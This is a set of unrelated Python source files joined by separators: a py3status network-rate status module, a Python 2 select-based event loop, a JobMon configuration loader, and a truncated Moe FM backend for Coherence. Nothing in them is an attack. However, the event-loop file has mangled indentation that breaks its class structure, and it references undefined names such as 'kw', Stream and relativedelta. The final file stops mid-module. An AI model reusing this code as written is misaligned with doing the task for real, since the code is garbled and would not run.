all_interfaces: ignore self.interfaces, but not self.interfaces_blacklist
(default True)
cache_timeout: how often we refresh this module in seconds
(default 2)
devfile: location of dev file under /proc
(default '/proc/net/dev')
format: format of the module output
(default '{interface}: {total}')
format_no_connection: when there is no data transmitted from the start of the plugin
(default '')
format_value: format to use for values
(default "[\?min_length=11 {value:.1f} {unit}]")
hide_if_zero: hide indicator if rate == 0
(default False)
interfaces: comma separated list of interfaces to track
(default [])
interfaces_blacklist: comma separated list of interfaces to ignore
(default 'lo')
si_units: use SI units
(default False)
sum_values: sum values of each interface instead of taking the top one
(default False)
thresholds: specify color thresholds to use
(default [(0, 'bad'), (1024, 'degraded'), (1024 * 1024, 'good')])
unit: unit to use. If the unit contains a multiplier prefix, only this
exact unit will ever be used
(default "B/s")
Format placeholders:
{down} download rate
{interface} name of interface
{total} total rate
{up} upload rate
format_value placeholders:
{unit} current unit
{value} numeric value
Color thresholds:
{down} Change color based on the value of down
{total} Change color based on the value of total
{up} Change color based on the value of up
@author shadowprince
@license Eclipse Public License
SAMPLE OUTPUT
{'full_text': 'eno1: 852.2 KiB/s'}
"""
from __future__ import division # python2 compatibility
from time import time
class Py3status:
    """
    Display network transfer rate of the busiest (or summed) interface.
    See the module docstring for configuration parameter documentation.
    """

    # available configuration parameters
    all_interfaces = True
    cache_timeout = 2
    devfile = "/proc/net/dev"
    format = "{interface}: {total}"
    format_no_connection = ""
    format_value = "[\?min_length=11 {value:.1f} {unit}]"
    hide_if_zero = False
    interfaces = []
    interfaces_blacklist = "lo"
    si_units = False
    sum_values = False
    thresholds = [(0, "bad"), (1024, "degraded"), (1024 * 1024, "good")]
    unit = "B/s"

    class Meta:
        # Backward-compatibility shim: translate the removed `precision`
        # option into an equivalent `format_value` string.
        def deprecate_function(config):
            # support old thresholds
            precision = config.get("precision", 1)
            # min_length = 3 digits + '.' + precision digits + space + unit
            # (units are at most 5 characters wide)
            padding = 3 + 1 + precision + 1 + 5
            format_value = "[\?min_length={padding} {{value:.{precision}f}} {{unit}}]".format(
                padding=padding, precision=precision
            )
            return {"format_value": format_value}

        deprecated = {
            "function": [{"function": deprecate_function}],
            "remove": [
                {"param": "precision", "msg": "obsolete, use format_value instead"}
            ],
        }

    def post_config_hook(self):
        """Normalize configuration values and prime the rate-sampling state."""
        # parse some configuration parameters
        if not isinstance(self.interfaces, list):
            self.interfaces = self.interfaces.split(",")
        if not isinstance(self.interfaces_blacklist, list):
            self.interfaces_blacklist = self.interfaces_blacklist.split(",")

        # Collect the `{value}` placeholder formats so net_rate() can later
        # check whether a rate renders as zero in the configured unit.
        placeholders = self.py3.get_placeholder_formats_list(self.format_value)
        values = ["{%s}" % x[1] for x in placeholders if x[0] == "value"]
        self._value_formats = values

        # last -- the previous sample, used to compute per-interval deltas
        self.last_interface = None
        self.last_stat = self._get_stat()
        self.last_time = time()

        self.thresholds_init = self.py3.get_color_names_list(self.format)

    def net_rate(self):
        """Compute and render the current transfer rate (module entry point)."""
        network_stat = self._get_stat()
        deltas = {}
        try:
            # time from previous check
            current_time = time()
            timedelta = current_time - self.last_time

            # calculate deltas for all interfaces
            # NOTE(review): zip() pairs rows positionally; this assumes the
            # set and order of interfaces in devfile is stable between two
            # reads -- confirm.
            for old, new in zip(self.last_stat, network_stat):
                # columns 1 and 9 are received / transmitted byte counters
                down = (int(new[1]) - int(old[1])) / timedelta
                up = (int(new[9]) - int(old[9])) / timedelta

                deltas[new[0]] = {"total": up + down, "up": up, "down": down}

            # update last_ info
            self.last_stat = network_stat
            self.last_time = current_time

            # get the interface with max rate
            if self.sum_values:
                interface = "sum"
                sum_up = sum([itm["up"] for _, itm in deltas.items()])
                sum_down = sum([itm["down"] for _, itm in deltas.items()])
                deltas[interface] = {
                    "total": sum_up + sum_down,
                    "up": sum_up,
                    "down": sum_down,
                }
            else:
                interface = max(deltas, key=lambda x: deltas[x]["total"])

            # if there is no rate - show last active interface, or hide
            # we need to check if it will be zero after it is formatted
            # with the desired unit eg MB/s
            total, _ = self.py3.format_units(
                deltas[interface]["total"], unit=self.unit, si=self.si_units
            )
            values = [float(x.format(total)) for x in self._value_formats]
            if max(values) == 0:
                interface = self.last_interface
                hide = self.hide_if_zero
            # if there is - update last_interface
            else:
                self.last_interface = interface
                hide = False

            # get the deltas into variable
            delta = deltas[interface] if interface else None
        except (TypeError, ValueError, KeyError):
            # first run (no usable previous sample) or unparsable devfile data
            delta = None
            interface = None
            hide = self.hide_if_zero

        response = {"cached_until": self.py3.time_in(self.cache_timeout)}

        if hide:
            response["full_text"] = ""
        elif not interface:
            response["full_text"] = self.format_no_connection
        else:
            for x in self.thresholds_init:
                if x in delta:
                    self.py3.threshold_get_color(delta[x], x)
            # NOTE(review): interface keys keep their trailing ':' from
            # /proc/net/dev, hence the [:-1] slice below; when sum_values is
            # True the synthetic "sum" key is also sliced, displaying "su" --
            # confirm this is intended.
            response["full_text"] = self.py3.safe_format(
                self.format,
                {
                    "down": self._format_value(delta["down"]),
                    "total": self._format_value(delta["total"]),
                    "up": self._format_value(delta["up"]),
                    "interface": interface[:-1],
                },
            )

        return response

    def _get_stat(self):
        """
        Get statistics from devfile in list of lists of words
        """

        def dev_filter(x):
            # get first word and remove trailing interface number
            # (the first field looks like "eth0:"; [:-1] drops the colon)
            x = x.strip().split(" ")[0][:-1]
            if x in self.interfaces_blacklist:
                return False
            if self.all_interfaces:
                return True
            if x in self.interfaces:
                return True
            return False

        # read devfile, skip two header files
        # NOTE(review): the file handle is never closed explicitly; relies on
        # CPython refcounting -- consider a `with` block.
        x = filter(dev_filter, open(self.devfile).readlines()[2:])
        try:
            # split info into words, filter empty ones
            return [list(filter(lambda x: x, _x.split(" "))) for _x in x]
        except StopIteration:
            return None

    def _format_value(self, value):
        """
        Return formatted string
        """
        value, unit = self.py3.format_units(value, unit=self.unit, si=self.si_units)
        return self.py3.safe_format(self.format_value, {"value": value, "unit": unit})
# Allow running this file directly to exercise the module outside of py3status.
if __name__ == "__main__":
    """
    Run module in test mode.
    """
    from py3status.module_test import module_test

    module_test(Py3status)
| |
import os
import heapq
import time
import threading
import select
import errno
local = threading.local()
import logging
def stop():
    """Halt this thread's running event loop."""
    loop = current_event_loop()
    loop.stop()
def call_later(when, method, *args):
    """Schedule *method(*args)* on this thread's event loop after *when*."""
    loop = current_event_loop()
    return loop.call_later(when, method, *args)
def call_soon(method, *args):
    """Queue *method(*args)* on this thread's event loop to run as soon as possible."""
    loop = current_event_loop()
    return loop.call_soon(method, *args)
def call_soon_threadsafe(method, *args):
    """Like call_soon(), but safe to invoke from a different thread."""
    loop = current_event_loop()
    return loop.call_soon_threadsafe(method, *args)
def current_event_loop():
    """Return the EventLoop bound to this thread, creating it on first use."""
    try:
        return local.event_loop
    except AttributeError:
        local.event_loop = EventLoop()
        return local.event_loop
def add_reader(fd, callback, *args):
    """Watch *fd* for readability on this thread's event loop."""
    loop = current_event_loop()
    loop.add_reader(fd, callback, *args)
def remove_reader(fd):
    """Stop watching *fd* for readability on this thread's event loop."""
    loop = current_event_loop()
    loop.remove_reader(fd)
def remove_writer(fd):
    """Stop watching *fd* for writability on this thread's event loop."""
    loop = current_event_loop()
    loop.remove_writer(fd)
def run():
    """Run this thread's event loop until it stops or runs out of work."""
    loop = current_event_loop()
    loop.run()
def fileno(fd):
    """Return *fd* unchanged when it is already an integer descriptor,
    otherwise the descriptor reported by the object's fileno() method."""
    return fd if isinstance(fd, int) else fd.fileno()
# Note: this is a port of a run_loop I wrote 10 years ago,
# I've started adapting it to conform to http://www.python.org/dev/peps/pep-3156/
# which will be implemented for Python 3.4
# Who knows, maybe this could be used to backport this capabilities to older
# pythons.
# Anyway, long story short: the descriptions and docs in this class's
# methods may be out of date.
class EventLoop(object):
"""An event loop that provides edge-triggered notifications.
This EventLoop monitors a series of file descriptors, timers and
OS signals for events.
On each pass through the EventLoop we check to see if any timer has
expired, at which point we call the timer's timeout() method,
giving the Timer an opportunity to perform any necessary actions.
After notifying each expired Timer we calculate how long until
the next timer (if any) will expire.
We then ask the OS to put us to sleep until one or more of
our event sources is ready or our timeout has expired.
When we wake up it's because one of our descriptors
is in the ready state, a timer has expired, or both.
If one of our descriptors is ready we remove it from the list of
descriptors to be monitored and then notify the appropriate
callback/delegate that it can now read or write the descriptor
without blocking. Note: it's the responsibility of the delegate
to ask the EventLoop to remonitor a descriptor.
*NOTE* Above statement is incorrect,
And that's it the loop starts over if there are any timers or
descriptors left to be monitored.
You do not need to instantiate an EventLoop; there should only be
one per thread. To get the EventLoop for the current thread simply
call current_event_loop() like so
>>> import event_loop
>>> loop = event_loop.current_event_loop()
To determine if the EventLoop is running you can examine its
running property; in this particular case we're not running
>>> loop.running
False
To start the EventLoop you must call run(); this will block the
thread until the EventLoop runs out of things to monitor. Since we
have nothing to monitor, calling run() will return right away.
>>> loop.run()
>>> loop.running
False
So we have a Timer, it has an attribute called timeOutCalled
which is currently false
>>> myTimer.timeOutCalled
False
We add it to the EventLoop then run the EventLoop
>>> timer = EventLoop.addTimer(myTimer)
>>> EventLoop.run()
And when the EventLoop completes our timer's timeout value should
have been called.
>>> myTimer.timeOutCalled
True
Noticed that the code returned imediatly because after signaling
this timer there was nothing else to monitor. Typically
applications that use a EventLoop will always ensure that there's
something to monitor. For instance we can make a component that
get's called once every millisecond for 10 miliseconds by simply
readding the Timer back to the EventLoop in the Timer's timeout
method like this.
>>> class HeartBeat:
... def __init__(self):
... self.time = time.time() + .01
... self.cancelled = self.called = False
... self.ticks = 0
... def on_timeout(self):
... self.ticks += 1
... if self.ticks < 10:
... self.time = time.time() + .01
... EventLoop.currentEventLoop().addTimer(self)
Notice in this example a couple of things, for one we set
HeartBeat.time to be the current time plus ".01". In other words
we want are timeout() method to be called 1 milisecond from
now. We keep track of how many times we're called, if it's less
than 10 we reschedule ourselves back in the current
EventLoop. This demonstrates how an object doesn't need to keep a
reference to the EventLoop to use it.
>>> timer = HeartBeat()
>>> timer.ticks
0
>>> timer = EventLoop.addTimer(timer)
>>> EventLoop.run()
>>> timer.ticks
10
Normally you wouldn't implement your own Timer class because
most of the basic ones that you'd need have already been
implemented for you like a DeferedCall which will run a specific
method after a certain delay and optionally repeat if neccesary.
"""
def __init__(self):
    # Calls queued from other threads via call_soon_threadsafe(); drained
    # once per pass in runOnce().
    self.threadCallQueue = []
    # fd -> (callback, args) tables consulted by select() on each pass.
    self.readers = {}
    self.writers = {}
    # Self-pipe style wake-up: writing a byte to `waker` interrupts a
    # blocking select() so another thread can wake this loop.
    reader, writer = os.pipe()
    self.waker = writer
    # NOTE(review): `Stream` and `on_wakeup` are not defined in this module;
    # presumably provided elsewhere in the package -- confirm.
    self.waker_reader = Stream(reader)
    self.add_reader(self.waker_reader, self.on_wakeup)
    self.running = False
    # Heap (managed via heapq in runOnce) of pending timers ordered by time.
    self.timers = []
@property
def log(self):
    # Expose the logging module itself so methods can call
    # self.log.exception(...); NOTE(review): a named logger via
    # logging.getLogger(__name__) would allow per-module configuration.
    return logging
def add_reader(self, fd, callback, *args):
    """Invoke *callback(*args)* whenever *fd* becomes readable."""
    key = fileno(fd)
    self.readers[key] = (callback, args)
def remove_reader(self, fd):
    """Forget the read callback registered for *fd*."""
    key = fileno(fd)
    del self.readers[key]
def add_writer(self, fd, callback, *args):
    """Invoke *callback(*args)* whenever *fd* becomes writable."""
    key = fileno(fd)
    self.writers[key] = (callback, args)
def remove_writer(self, fd):
    """Forget the write callback registered for *fd*."""
    key = fileno(fd)
    del self.writers[key]
def reset(self):
    """Return the loop to an idle state, dropping every monitored source."""
    self.running = False
    # NOTE(review): clearing `readers` also drops the waker pipe's
    # registration made in __init__, and it is never re-registered here --
    # confirm whether a reset loop can still be woken from another thread.
    self.readers = {}
    self.writers = {}
    self.timers = []
    self.threadCallQueue = []
    # Drain one pending wake-up byte so a stale wake does not fire on the
    # next run.  NOTE(review): assumes at most one byte is pending -- confirm.
    self.waker_reader.read(1)
def _shouldRun(self,timerCapacity):
    """Decide whether the loop still has work to do (internal)."""
    # Internal method, determines if the EventLoop should be stopped.
    # EventLoop.run() will call this method with a value of 0,
    # indicating that if there are any timers, then the EventLoop
    # should continue until they fire.
    # EventLoop.runUntil() will call this method with a value of
    # one, indicating that there must be more than 1 timer, or
    # else the EventLoop should quit. This is because runUntil()
    # adds one timer to stop the EventLoop at the specified time,
    # but this timer shouldn't be considered something that keeps
    # the EventLoop going if there is no other activity to monitor.

    # Keep calling the EventLoop until someone stops us, we
    # have no timers or the readers and writers drops to 1
    # (EventLoops keep one reader around -- the waker pipe -- to wake
    # themselves up from a sleep)
    return self.running and (len(self.readers) + len(self.writers) > 1 or
    len(self.timers) > timerCapacity or self.threadCallQueue)
def quitOnExceptionHandler(self, exception):
    """Default exception policy: log the error and stop the loop."""
    self.log.exception("Caught unexpected error in RunOnce.")
    self.stop()
# Alias used by run(); rebind to a different handler to override the policy.
handleException = quitOnExceptionHandler
def run(self, reset_on_stop=True):
    """Keeps the EventLoop going until it's explicitly stopped or it runs out
    of things to monitor.

    :param reset_on_stop: when True (the default) the loop's state is
        cleared via reset() once the loop exits.
    """
    if self.running:
        raise RuntimeError("EventLoop is already running.")
    else:
        self.running = True
    while self.running: #self._shouldRun(0):
        try:
            self.runOnce()
        # Python 2 `except` syntax -- this module targets Python 2.
        except Exception, e:
            # Delegate the policy decision (log/stop/ignore) to the
            # configured handler (quitOnExceptionHandler by default).
            self.handleException(e)
    if reset_on_stop:
        self.reset()
def runUntil(self, stopDate=None, **kw):
    """Runs the EventLoop until the given time plus interval have been
    reached or it runs out of things to monitor. This method
    should not be called when the EventLoop is already running.

    The current time is assumed if no datetime is passed in.

    Examples: (note, these aren't real doctests yet)

    Run until a given date, say St. Patty's day
    >> date=datetime.datetime(2007, 03,17, 17,00)
    >> EventLoop.currentEventLoop().runUntil(dateAndTime)

    Additionally you can pass in any keyword argument normally
    taken by dateutil.relativedelta to derive the date. These
    include:

    years, months, weeks, days, hours, minutes, seconds, microseconds

    These are most useful when you want to compute the relative
    offset from now. For example to run the EventLoop for 5 seconds
    you could do this.
    >> EventLoop.currentEventLoop().runUntil(seconds=5)

    Or, probably not as practical but still possible, wait one
    year and 3 days
    >> EventLoop.currentEventLoop().runUntil(years=1, days=3)

    :param stopDate: datetime at which to stop; defaults to now, so that
        only the relative keyword offset applies.
    :raises RuntimeError: if the loop is already running.
    """
    if self.running:
        raise RuntimeError("EventLoop is already running.")
    else:
        self.running = True
    # NOTE(review): `relativedelta` and `datetime` are not imported in this
    # module's visible header -- presumably imported elsewhere; confirm.
    delta = relativedelta(**kw)
    now = datetime.datetime.now()
    if stopDate is None:
        stopDate = now
    # Bug fix: apply the relative offset to the caller's stopDate.
    # Previously this line read `stopDate = now + delta`, which silently
    # ignored any stopDate passed in by the caller.
    stopDate = stopDate + delta
    # convert the time back into seconds since the epoch,
    # subtract now from it, and this will then be the delay we
    # can use
    seconds2Run = time.mktime(stopDate.timetuple()) - time.mktime(now.timetuple())
    self.waitBeforeCalling(seconds2Run, self.stop)
    while self._shouldRun(1):
        try:
            self.runOnce()
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are no longer swallowed; unexpected errors are still logged and
        # the loop keeps going.
        except Exception:
            self.log.exception("Caught unexpected error in RunOnce.")
    self.reset()
    def runOnce(self):
        """Perform a single pass of the event loop.

        One pass: (1) drain the calls queued via callFromThread, (2) fire
        every expired timer, (3) select() on the monitored readers/writers
        and dispatch their callbacks.  Returns early when there is nothing
        left to monitor.
        """
        # Call every function that was queued via callFromThread up
        # until this point, but nothing more.  Otherwise we could be
        # stuck doing this forever and never get to the other calls.
        pending = len(self.threadCallQueue)
        tried = 0
        try:
            for (f, a, kw) in self.threadCallQueue[:pending]:
                tried += 1
                f(*a, **kw)
        finally:
            # It's possible that more calls came in since we started,
            # but they should be on the end of the list.
            del self.threadCallQueue[:tried]
        # We sleep until we either receive data or our earliest
        # timer has expired.
        currentTime = time.time()
        # Fire every timer that's expired.
        while self.timers:
            timer = heapq.heappop(self.timers)
            if timer.cancelled:
                # Cancelled timers are discarded as they surface on the heap.
                continue
            timeout = timer.time - currentTime
            if timeout <= 0:
                # It's expired: call it.
                timer.on_timeout()
            else:
                # This timer hasn't expired; put it back on the heap and use
                # its remaining time as the select() timeout below.
                heapq.heappush(self.timers, timer)
                break
        else:
            if (len(self.readers) + len(self.writers)) < 1:
                # We don't have any timers; if we're not monitoring
                # any descriptors we need to bail.
                return
            else:
                # No timed events, but we have file descriptors
                # to monitor, so sleep until they have
                # activity.
                timeout = None
        try:
            ready2Read, ready2Write, hadErrors =\
                select.select(self.readers.keys(),
                              self.writers.keys(),
                              [], timeout)
        except (select.error, IOError), e:
            if e.args[0] == errno.EINTR:
                # A signal interrupted our select; hopefully someone else is
                # handling signals and using callFromThread to do the right
                # thing.
                return
            elif e.args[0] == errno.EBADF:
                # A monitored descriptor went bad; weed out the culprit(s).
                self.clear_bad_descriptor()
                return
            else:
                raise
        while ready2Read or ready2Write or hadErrors:
            # NOTE: popping one descriptor per iteration keeps us from
            # getting hung up doing all reads or all writes at once.
            if ready2Read:
                fileno = ready2Read.pop()
                callback, args = self.readers[fileno]#.pop(fileno)
                callback(*args)
            if ready2Write:
                writer = ready2Write.pop()
                # The writer may have been removed by a callback in the read
                # branch above, hence the do-nothing default.
                callback, args = self.writers.get(writer, (lambda:None,[]))
                callback(*args)
                # Writers, when ready, will always be ready.  To avoid an
                # infinite loop, an app that wishes to write more data must
                # call addWriter() again.
def stop(self):
# drop us out of the run loop on it's next pass
self.running = False
self.wakeup()
def addTimer(self, timer):
heapq.heappush(self.timers, timer)
self.wakeup()
# we return the timer for convienance sake
return timer
    def wakeup(self):
        # Writing a single byte into the waker pipe makes the select() in
        # runOnce() return immediately, so loop-state changes made from
        # other threads or signal handlers are noticed promptly.
        os.write(self.waker, 'x') # write one byte to wake up the EventLoop
    def on_wakeup(self):
        # We've been woken up: consume and ignore the byte.  Reading again
        # re-arms the reader so the waker stays scheduled in the EventLoop.
        self.waker_reader.read(1)
def call_later(self, seconds, method, *args, **kw):
# Create a non repeating event
dc = DelayedCall(seconds, method, *args, **kw)
self.addTimer(dc)
return dc
def call_soon(self, callback, *args):
return self.call_later(0, callback, *args)
def call_soon_threadsafe(self, f, *args):
assert callable(f), "%s is not callable" % f
self.threadCallQueue.append((f, args, kw))
self.wakeup()
def intervalBetweenCalling(self, secondsOrRRule, method, *args, **kw):
# Create a repeating event, this method can be called
# either with the number of seconds between each call or
# it can be passed a string or dateutil.rrule
t = type(secondsOrRRule)
# Convert to an RRULe if it's a string or a number
if t in (int, float):
rule = rrule.rrule(rrule.SECONDLY, interval=secondsOrRRule)
elif isinstance(secondsOrRRule, basestring):
rule = rrule.rrulestr(secondsOrRRule)
else:
# hopefully it's an object that returns an iteration of datetime objects
rule = secondsOrRRule
dc = DelayedCall(iter(rule), method, *args, **kw)
self.addTimer(dc)
return dc
def clear_bad_descriptor(self):
# ugh not pretty when this happens
for key in self.readers.keys():
try:
select.select([key],[],[], 0)
except Exception, e:
bad = self.readers.pop(key)
bad.onError(e)
for key in self.writers.keys():
try:
select.select([],[key],[], 0)
except Exception, e:
bad = self.writers.pop(key)
bad.onError(e)
class DelayedCall:
    """A (possibly repeating) scheduled call, ordered by absolute fire time.

    Instances live on the EventLoop's timer heap; ordering is by ``time``
    (seconds since the epoch) via the Python-2-only __cmp__ protocol.
    """
    def __init__(self, secondsOrRRule, func, *args, **kw):
        # repeatRule stays None for one-shot calls; for repeating calls it
        # holds an iterator of datetime objects (e.g. iter(rrule)).
        self.repeatRule = None
        try:
            # Assume a plain number of seconds from now...
            self.time = time.time() + secondsOrRRule
        except TypeError:
            # ...it's not a number of seconds; hopefully it's an rrule
            # that's been converted to a generator of datetimes.
            self.repeatRule = secondsOrRRule
            dt = self.repeatRule.next()
            self.time = time.mktime(dt.timetuple()) #time.time() + self.delay
        # NOTE(review): ``called`` is never set to True anywhere in this
        # class, so the AlreadyCalled branch in cancel() looks unreachable.
        self.cancelled = self.called = False
        self.func = func
        self.args = args
        self.kw = kw
        self.delayed_time = 0
    def __cmp__(self, other):
        # Py2 ordering hook: heapq uses this to order timers by fire time.
        return cmp(self.time, other.time)
    def on_timeout(self):
        # Fire the call unless cancelled; repeating calls reschedule
        # themselves from their rule's next datetime.
        if not self.cancelled:
            self.func(*self.args, **self.kw)
            if self.repeatRule:
                try:
                    dt = self.repeatRule.next()
                    self.time = time.mktime(dt.timetuple()) #time.time() + self.delay
                    current_event_loop().addTimer(self)
                except StopIteration: # rule has been exhausted
                    pass
    def cancel(self):
        """Unschedule this call
        @raise AlreadyCancelled: Raised if this call has already been
        unscheduled.
        @raise AlreadyCalled: Raised if this call has already been made.
        """
        if self.cancelled:
            raise RuntimeError("Already Cancelled")
        elif self.called:
            raise RuntimeError("Already Called")
        else:
            self.cancelled = True
            # Drop the payload immediately to break reference cycles.
            del self.func, self.args, self.kw
class Future(object):
    """Minimal future stub: each instance receives a unique, increasing id
    drawn from a class-level counter."""
    counter = 0
    def __init__(self):
        # Bump the shared counter and adopt its new value as our id.
        Future.counter = Future.counter + 1
        self.id = Future.counter
from .transports import Stream
| |
"""
JobMon Configuration Handling
=============================
Implements configuration file reading and validation, which includes:
- Configuration options for the supervisor itself.
- Configuration options for individual jobs.
- The ability to load jobs from multiple files.
Typically, the use for this module is simply::
>>> config_handler = ConfigHandler()
>>> config_handler.load(SOME_FILE)
"""
import glob
import json
import logging
import os
import signal
import string
from jobmon import monitor
# Map signal and log-level names to their numeric values so that
# configuration file authors do not have to reference the constants
# numerically.
SIGNAL_NAMES = dict(
    (sig_name, getattr(signal, sig_name))
    for sig_name in dir(signal)
    # Every real signal is named 'SIG<name>'; constants such as SIG_IGN and
    # SIG_BLOCK also start with 'SIG' but contain an underscore, which is
    # how they are excluded here.
    if sig_name.startswith('SIG') and '_' not in sig_name
)
LOG_LEVELS = dict(
    (log_level, getattr(logging, log_level))
    for log_level in ('CRITICAL', 'DEBUG', 'ERROR', 'FATAL', 'INFO',
                      'WARN', 'WARNING')
)
def expand_path_vars(path):
    """
    Expand $-style environment substitutions in *path*.

    :func:`os.path.expandvars` offers no way to escape substitutions,
    unlike :class:`string.Template` (which honours ``$$``), so the
    expansion is done manually via a template.  Unknown variables are
    left untouched by safe_substitute.
    """
    return string.Template(path).safe_substitute(os.environ)
class ConfigHandler:
    """
    Reads, stores, and validates configuration options.
    - :attr:`jobs` maps each job name to a
      :class:`jobmon.monitor.ChildProcessSkeleton`.
    - :attr:`working_dir` stores the supervisor's working directory.
    - :attr:`control_port` stores the port number which is used for commands.
    - :attr:`event_port` stores the port number which is used for events.
    - :attr:`log_level` stores the logging level for the supervisor's logging
      output.
    - :attr:`log_file` stores the path where the supervisor's logging output
      will be written.
    - :attr:`autostarts` stores a list of jobs to start immediately.
    - :attr:`restarts` lists the jobs which are restarted automatically.
    """
    def __init__(self):
        self.jobs = {}
        self.logger = logging.getLogger('config')
        # Defaults used when the configuration file omits an option.
        self.working_dir = '.'
        self.control_port = 6666
        self.event_port = 6667
        self.includes = []
        self.log_level = logging.WARNING
        self.log_file = '/dev/null'
        self.autostarts = []
        self.restarts = []
    def read_type(self, dct, key, expected_type, default=None):
        """
        Reads a value from a dictionary. If it is of the expected type, then
        that value is returned - otherwise, a default value is returned
        instead.
        :param dict dct: The JSON object to read the information from.
        :param str key: The name of the value to read.
        :param type expected_type: The expected type of the value.
        :param default: The default value.
        """
        value = dct[key]
        if not isinstance(value, expected_type):
            # FIX: log the offending value's type; the old message
            # interpolated the value itself where a type name belonged.
            self.logger.error('Expected "%s" to be a %s, but got a %s instead',
                              key, expected_type, type(value).__name__)
            return default
        return value
    def load(self, config_file):
        """
        Loads the main jobs file, extracting information from both the main
        configuration file and any included jobs files.
        :param str config_file: The path to the configuration file to load.
        :raises ValueError: If no jobs are configured after all files load.
        """
        self.logger.info('Loading main configuration file "%s"', config_file)
        with open(config_file) as config:
            config_info = json.load(config)
        if 'supervisor' in config_info:
            if not isinstance(config_info['supervisor'], dict):
                self.logger.warning('supervisor configuration is not a hash')
            else:
                self.handle_supervisor_config(config_info['supervisor'])
        if 'jobs' in config_info:
            if not isinstance(config_info['jobs'], dict):
                self.logger.warning('jobs configuration is not a hash')
            else:
                self.handle_jobs(config_info['jobs'])
        if not self.jobs:
            self.logger.error('No jobs are configured, aborting')
            raise ValueError
    def handle_supervisor_config(self, supervisor_map):
        """
        Parses out the options meant for the supervisor, then loads any job
        files matched by the 'include-dirs' globs.
        :param dict supervisor_map: A dictionary of options.
        """
        if 'working-dir' in supervisor_map:
            self.working_dir = expand_path_vars(
                self.read_type(supervisor_map, 'working-dir', str,
                               self.working_dir))
        if 'control-port' in supervisor_map:
            self.control_port = self.read_type(supervisor_map, 'control-port', int,
                                               self.control_port)
        if 'event-port' in supervisor_map:
            self.event_port = self.read_type(supervisor_map, 'event-port', int,
                                             self.event_port)
        if 'include-dirs' in supervisor_map:
            self.includes = self.read_type(supervisor_map, 'include-dirs',
                                           list, self.includes)
        if 'log-level' in supervisor_map:
            log_level_name = self.read_type(supervisor_map, 'log-level', str,
                                            None)
            if log_level_name is not None:
                log_level_name = log_level_name.upper()
                if log_level_name in LOG_LEVELS:
                    self.log_level = LOG_LEVELS[log_level_name]
                else:
                    # FIX: the old message read "... not a valid
                    # self.logger.level" (a botched find/replace).
                    self.logger.warning('%s is not a valid log level',
                                        log_level_name)
        if 'log-file' in supervisor_map:
            self.log_file = expand_path_vars(
                self.read_type(supervisor_map, 'log-file', str,
                               self.log_file))
        included_jobfiles = []
        for include_glob in self.includes:
            self.logger.info('Expanding glob "%s"', include_glob)
            globs = glob.glob(expand_path_vars(include_glob))
            included_jobfiles += globs
            for filename in globs:
                self.logger.info('- Got file "%s"', filename)
        for filename in included_jobfiles:
            try:
                self.logger.info('Loading job file "%s"', filename)
                with open(filename) as jobfile:
                    jobs_map = json.load(jobfile)
                if not isinstance(jobs_map, dict):
                    self.logger.warning('"%s" is not a valid jobs file', filename)
                else:
                    self.handle_jobs(jobs_map)
            except OSError as ex:
                self.logger.warning('Unable to open "%s" - %s', filename, ex)
        # BUG FIX: an unconditional "raise ValueError('No jobs defined -
        # cannot continue')" used to sit here, aborting every run before
        # the main file's jobs were even parsed (load() calls this method
        # *before* handle_jobs).  load() already performs the final
        # "no jobs" validation, so nothing more is needed here.
    def handle_jobs(self, jobs_map):
        """
        Parses out a group of jobs.
        :param dict jobs_map: A dictionary of jobs, indexed by name.
        """
        for job_name, job in jobs_map.items():
            self.logger.info('Parsing info for %s', job_name)
            # Jobs without a command, and duplicate names, are skipped.
            if 'command' not in job:
                self.logger.warning('Continuing - %s lacks a command', job_name)
                continue
            if job_name in self.jobs:
                self.logger.warning('Continuing - job %s is a duplicate', job_name)
                continue
            process = monitor.ChildProcessSkeleton(job_name, job['command'])
            if 'stdin' in job:
                default_value = process.stdin
                process.config(stdin=expand_path_vars(
                    self.read_type(job, 'stdin', str, default_value)))
            if 'stdout' in job:
                default_value = process.stdout
                process.config(stdout=expand_path_vars(
                    self.read_type(job, 'stdout', str, default_value)))
            if 'stderr' in job:
                default_value = process.stderr
                process.config(stderr=expand_path_vars(
                    self.read_type(job, 'stderr', str, default_value)))
            if 'env' in job:
                default_value = process.env
                process.config(env=self.read_type(job, 'env', dict, default_value))
            if 'working-dir' in job:
                default_value = process.working_dir
                process.config(cwd=expand_path_vars(
                    self.read_type(job, 'working-dir', str, default_value)))
            if 'signal' in job:
                default_value = process.exit_signal
                sig_name = self.read_type(job, 'signal', str, default_value)
                sig_name = sig_name.upper()
                if sig_name not in SIGNAL_NAMES:
                    # FIX: "it not" -> "is not" in the warning text.
                    self.logger.warning('%s is not a valid signal name', sig_name)
                else:
                    process.config(sig=SIGNAL_NAMES[sig_name])
            if 'autostart' in job:
                should_autostart = self.read_type(job, 'autostart', bool, False)
                if should_autostart:
                    self.autostarts.append(job_name)
            if 'restart' in job:
                should_restart = self.read_type(job, 'restart', bool, False)
                if should_restart:
                    self.restarts.append(job_name)
            self.jobs[job_name] = process
| |
from __future__ import print_function, unicode_literals
import re
import itertools
from HTMLParser import HTMLParser
from coherence import log
from coherence.upnp.core import DIDLLite
from coherence.upnp.core.utils import ReverseProxyUriResource
from coherence.upnp.core.DIDLLite import (
Resource,
)
from coherence.backend import (
BackendItem, Container, AbstractBackendStore,
)
import api
import settings
# Shared HTMLParser instance, used only for its unescape() method to decode
# HTML entities in track metadata returned by the Moe FM API.
_htmlparser = HTMLParser()
class MoeFmProxyStream(ReverseProxyUriResource, log.Loggable):
    """Reverse-proxied stream for a single track.  Reports a "listen" event
    to the Moe FM API once half of the track's duration has elapsed."""
    logCategory = 'moefm_stream'
    def __init__(self, uri, parent):
        self.parent = parent
        ReverseProxyUriResource.__init__(self, uri.encode("utf-8"))
    def log_playing(self):
        # Only log while we are still the most recently played item; if
        # another track started since the timer was set, skip the report.
        if self.parent.store.last_played_item is self:
            obj_id = self.parent.sub_id
            d = api.moefm.get(
                "/ajax/log?log_obj_type=sub&log_type=listen&obj_type=song&api=json", # noqa
                {"obj_id": obj_id}
            )
            d.addCallback(lambda res: self.debug(
                "Logged %s: %r", obj_id, res,
            ))
            d.addErrback(lambda res: self.warning(
                "Unable to log %s: %r", obj_id, res,
            ))
    def render(self, request):
        # BUG FIX: 'reactor' was only imported inside this module's
        # __main__ block, so render() raised NameError whenever the backend
        # was loaded as a Coherence plugin.  Import it locally instead.
        from twisted.internet import reactor
        self.debug("render %r", self.parent.item_data)
        self.parent.container.on_item_play(self.parent)
        self.parent.store.last_played_item = self
        reactor.callLater(self.parent.duration_seconds / 2, self.log_playing)
